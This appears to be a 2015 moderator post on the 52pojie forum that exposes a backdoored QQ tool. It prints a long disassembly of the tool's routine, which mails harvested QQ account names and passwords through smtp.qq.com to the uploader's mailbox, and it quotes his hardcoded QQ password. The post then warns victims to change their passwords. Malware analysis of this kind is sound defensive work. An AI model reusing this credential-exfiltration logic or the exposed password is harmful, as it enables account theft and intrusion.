BanID:1529937【发布软件添加盗QQ后门】
今天例行在原创区审核新帖子,发现一篇帖子http://www.52pojie.cn/thread-439861-1-1.html(可以百度快照看)
看到“怕有毒绕道 ”这种言辞立马关注到,放木马病毒的最会用这样言辞骗取他人信任,空口无凭还是要用技术来验证一下,下了文件调试一下,加了SE的壳直接跑起来看到如下代码:
0040B19E 55 push ebp
0040B19F 8BEC mov ebp,esp
0040B1A1 81EC 1C000000 sub esp,0x1C
0040B1A7 6A 00 push 0x0
0040B1A9 6A 00 push 0x0
0040B1AB 6A 00 push 0x0
0040B1AD 68 04000080 push 0x80000004
0040B1B2 6A 00 push 0x0
0040B1B4 68 F17D4C00 push 一键拉好.004C7DF1 ; qwqwqw123
0040B1B9 68 04000080 push 0x80000004
0040B1BE 6A 00 push 0x0
0040B1C0 68 FB7D4C00 push 一键拉好.004C7DFB ; 1529937
0040B1C5 68 01030080 push 0x80000301
0040B1CA 6A 00 push 0x0
0040B1CC 68 19000000 push 0x19
0040B1D1 68 04000080 push 0x80000004
0040B1D6 6A 00 push 0x0
0040B1D8 68 037E4C00 push 一键拉好.004C7E03 ; smtp.qq.com
0040B1DD 68 05000000 push 0x5
0040B1E2 B8 04000000 mov eax,0x4
0040B1E7 BB 40CA4700 mov ebx,一键拉好.0047CA40
0040B1EC E8 3E830000 call 一键拉好.0041352F
0040B1F1 83C4 40 add esp,0x40
0040B1F4 6A FF push -0x1
0040B1F6 6A 08 push 0x8
0040B1F8 68 CB810116 push 0x160181CB
0040B1FD 68 01000152 push 0x52010001
0040B202 E8 2E830000 call 一键拉好.00413535
0040B207 83C4 10 add esp,0x10
0040B20A 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040B20D 6A FF push -0x1
0040B20F 6A 08 push 0x8
0040B211 68 CC810116 push 0x160181CC
0040B216 68 01000152 push 0x52010001
0040B21B E8 15830000 call 一键拉好.00413535
0040B220 83C4 10 add esp,0x10
0040B223 8945 F8 mov dword ptr ss:[ebp-0x8],eax
0040B226 FF75 F8 push dword ptr ss:[ebp-0x8]
0040B229 68 0F7E4C00 push 一键拉好.004C7E0F ; \r\n密码:
0040B22E FF75 FC push dword ptr ss:[ebp-0x4]
0040B231 68 187E4C00 push 一键拉好.004C7E18 ; 账号:
0040B236 B9 04000000 mov ecx,0x4
0040B23B E8 2F5EFFFF call 一键拉好.0040106F
0040B240 83C4 10 add esp,0x10
0040B243 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040B246 8B5D FC mov ebx,dword ptr ss:[ebp-0x4]
0040B249 85DB test ebx,ebx
0040B24B 74 09 je short 一键拉好.0040B256
0040B24D 53 push ebx
0040B24E E8 C4820000 call 一键拉好.00413517
0040B253 83C4 04 add esp,0x4
0040B256 8B5D F8 mov ebx,dword ptr ss:[ebp-0x8]
0040B259 85DB test ebx,ebx
0040B25B 74 09 je short 一键拉好.0040B266
0040B25D 53 push ebx
0040B25E E8 B4820000 call 一键拉好.00413517
0040B263 83C4 04 add esp,0x4
0040B266 6A 00 push 0x0
0040B268 6A 00 push 0x0
0040B26A 6A 00 push 0x0
0040B26C 68 04000080 push 0x80000004
0040B271 6A 00 push 0x0
0040B273 68 1F7E4C00 push 一键拉好.004C7E1F ; 1529937@qq.com
0040B278 BB 06000000 mov ebx,0x6
0040B27D E8 E165FFFF call 一键拉好.00401863
0040B282 68 04000080 push 0x80000004
0040B287 6A 00 push 0x0
0040B289 68 1F7E4C00 push 一键拉好.004C7E1F ; 1529937@qq.com
0040B28E 68 04000080 push 0x80000004
0040B293 6A 00 push 0x0
0040B295 8B45 F4 mov eax,dword ptr ss:[ebp-0xC]
0040B298 85C0 test eax,eax
0040B29A 75 05 jnz short 一键拉好.0040B2A1
0040B29C B8 356D4A00 mov eax,一键拉好.004A6D35
0040B2A1 50 push eax
0040B2A2 68 04000080 push 0x80000004
0040B2A7 6A 00 push 0x0
0040B2A9 68 2E7E4C00 push 一键拉好.004C7E2E ; QQ群盗号
0040B2AE 68 07000000 push 0x7
0040B2B3 B8 04000000 mov eax,0x4
0040B2B8 BB B0CA4700 mov ebx,一键拉好.0047CAB0
0040B2BD E8 6D820000 call 一键拉好.0041352F
0040B2C2 83C4 58 add esp,0x58
0040B2C5 8BD8 mov ebx,eax
0040B2C7 85DB test ebx,ebx
0040B2C9 74 09 je short 一键拉好.0040B2D4
0040B2CB 53 push ebx
0040B2CC E8 46820000 call 一键拉好.00413517
0040B2D1 83C4 04 add esp,0x4
0040B2D4 8B5D F4 mov ebx,dword ptr ss:[ebp-0xC]
0040B2D7 85DB test ebx,ebx
0040B2D9 74 09 je short 一键拉好.0040B2E4
0040B2DB 53 push ebx
0040B2DC E8 36820000 call 一键拉好.00413517
0040B2E1 83C4 04 add esp,0x4
0040B2E4 68 04000200 push 0x20004
0040B2E9 68 D0810116 push 0x160181D0
0040B2EE 68 01000152 push 0x52010001
0040B2F3 68 01000000 push 0x1
0040B2F8 B8 01000000 mov eax,0x1
0040B2FD BB C07B4700 mov ebx,一键拉好.00477BC0
0040B302 E8 28820000 call 一键拉好.0041352F
0040B307 83C4 10 add esp,0x10
0040B30A 6A FF push -0x1
0040B30C 6A 08 push 0x8
0040B30E 68 E2810116 push 0x160181E2
0040B313 68 01000152 push 0x52010001
0040B318 E8 18820000 call 一键拉好.00413535
0040B31D 83C4 10 add esp,0x10
0040B320 8945 FC mov dword ptr ss:[ebp-0x4],eax
0040B323 68 356D4A00 push 一键拉好.004A6D35
0040B328 FF75 FC push dword ptr ss:[ebp-0x4]
0040B32B E8 8E61FFFF call 一键拉好.004014BE
0040B330 83C4 08 add esp,0x8
0040B333 83F8 00 cmp eax,0x0
0040B336 B8 00000000 mov eax,0x0
0040B33B 0F95C0 setne al
0040B33E 8945 F8 mov dword ptr ss:[ebp-0x8],eax
0040B341 8B5D FC mov ebx,dword ptr ss:[ebp-0x4]
0040B344 85DB test ebx,ebx
0040B346 74 09 je short 一键拉好.0040B351
0040B348 53 push ebx
0040B349 E8 C9810000 call 一键拉好.00413517
0040B34E 83C4 04 add esp,0x4
0040B351 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
0040B355 0F84 A9000000 je 一键拉好.0040B404
0040B35B 6A FF push -0x1
0040B35D 6A 08 push 0x8
0040B35F 68 E3810116 push 0x160181E3
0040B364 68 01000152 push 0x52010001
0040B369 E8 C7810000 call 一键拉好.00413535
0040B36E 83C4 10 add esp,0x10
0040B371 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040B374 68 356D4A00 push 一键拉好.004A6D35
0040B379 FF75 F4 push dword ptr ss:[ebp-0xC]
0040B37C E8 3D61FFFF call 一键拉好.004014BE
0040B381 83C4 08 add esp,0x8
0040B384 83F8 00 cmp eax,0x0
0040B387 B8 00000000 mov eax,0x0
0040B38C 0F95C0 setne al
0040B38F 8945 F0 mov dword ptr ss:[ebp-0x10],eax
0040B392 8B5D F4 mov ebx,dword ptr ss:[ebp-0xC]
0040B395 85DB test ebx,ebx
0040B397 74 09 je short 一键拉好.0040B3A2
0040B399 53 push ebx
0040B39A E8 78810000 call 一键拉好.00413517
0040B39F 83C4 04 add esp,0x4
0040B3A2 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040B3A6 0F84 58000000 je 一键拉好.0040B404
0040B3AC 6A FF push -0x1
0040B3AE 6A 08 push 0x8
0040B3B0 68 E4810116 push 0x160181E4
0040B3B5 68 01000152 push 0x52010001
0040B3BA E8 76810000 call 一键拉好.00413535
0040B3BF 83C4 10 add esp,0x10
0040B3C2 8945 EC mov dword ptr ss:[ebp-0x14],eax
0040B3C5 68 356D4A00 push 一键拉好.004A6D35
0040B3CA FF75 EC push dword ptr ss:[ebp-0x14]
0040B3CD E8 EC60FFFF call 一键拉好.004014BE
0040B3D2 83C4 08 add esp,0x8
0040B3D5 83F8 00 cmp eax,0x0
0040B3D8 B8 00000000 mov eax,0x0
0040B3DD 0F95C0 setne al
0040B3E0 8945 E8 mov dword ptr ss:[ebp-0x18],eax
0040B3E3 8B5D EC mov ebx,dword ptr ss:[ebp-0x14]
0040B3E6 85DB test ebx,ebx
0040B3E8 74 09 je short 一键拉好.0040B3F3
0040B3EA 53 push ebx
0040B3EB E8 27810000 call 一键拉好.00413517
0040B3F0 83C4 04 add esp,0x4
0040B3F3 837D E8 00 cmp dword ptr ss:[ebp-0x18],0x0
0040B3F7 0F84 07000000 je 一键拉好.0040B404
0040B3FD B8 01000000 mov eax,0x1
0040B402 EB 05 jmp short 一键拉好.0040B409
0040B404 B8 00000000 mov eax,0x0
0040B409 85C0 test eax,eax
0040B40B 0F84 32000000 je 一键拉好.0040B443
0040B411 BB 06000000 mov ebx,0x6
0040B416 E8 4864FFFF call 一键拉好.00401863
0040B41B 68 06000080 push 0x80000006
0040B420 6A 00 push 0x0
0040B422 68 6BA44000 push 一键拉好.0040A46B
0040B427 68 03000000 push 0x3
0040B42C B8 03000000 mov eax,0x3
0040B431 BB 30C94700 mov ebx,一键拉好.0047C930
0040B436 E8 F4800000 call 一键拉好.0041352F
0040B43B 83C4 28 add esp,0x28
0040B43E E9 34000000 jmp 一键拉好.0040B477
0040B443 BB 06000000 mov ebx,0x6
0040B448 E8 1664FFFF call 一键拉好.00401863
0040B44D 68 01030080 push 0x80000301
0040B452 6A 00 push 0x0
0040B454 68 10000000 push 0x10
0040B459 68 04000080 push 0x80000004
0040B45E 6A 00 push 0x0
0040B460 68 377E4C00 push 一键拉好.004C7E37 ; 请重新登录QQ!
0040B465 68 04000000 push 0x4
0040B46A BB 604B4100 mov ebx,一键拉好.00414B60
0040B46F E8 B5800000 call 一键拉好.00413529
0040B474 83C4 34 add esp,0x34
0040B477 8BE5 mov esp,ebp
0040B479 5D pop ebp
0040B47A C3 retn
代码什么意思了?简单的说就是把登陆软件获取到的QQ账号和密码,通过QQ:1529937和密码:qwqwqw123登陆邮箱,然后发送到1529937@qq.com他自己的邮箱里,描述是“QQ群盗号”,还挺直白,可以通过QQ和就看到和这作者名字相同,应该就是他没错了,这小黑智商很堪忧,居然把自己QQ密码写到程序里,别人QQ盗了没有不知道,反正你QQ估计已经被盗了。
注意:
使用过此软件的同学请尽快修改QQ密码。
想对那些涂怀不轨的人说,你在吾爱破解这样的技术论坛玩这种小伎俩,分分钟就给你剥皮把肉看得清清楚楚了,这里都是活跃在互联网安全界的精英,任何小动作就是自讨苦吃,奉劝那些蠢蠢欲动的人,尽快走入正途,不要误入歧途!
最后感谢大家一直以来对吾爱破解论坛的支持和维护,论坛安全离不开大家监督,任何违法违规的行为都逃不过大家的眼睛和管理的审查,对待此类*渣论坛绝不手软,坚决处罚到底! |
[复制链接]
发表于 2015-11-30 18:26
发表于 2015-11-30 18:15
收藏
淘帖
有用
分享到朋友圈
试试申诉他的QQ号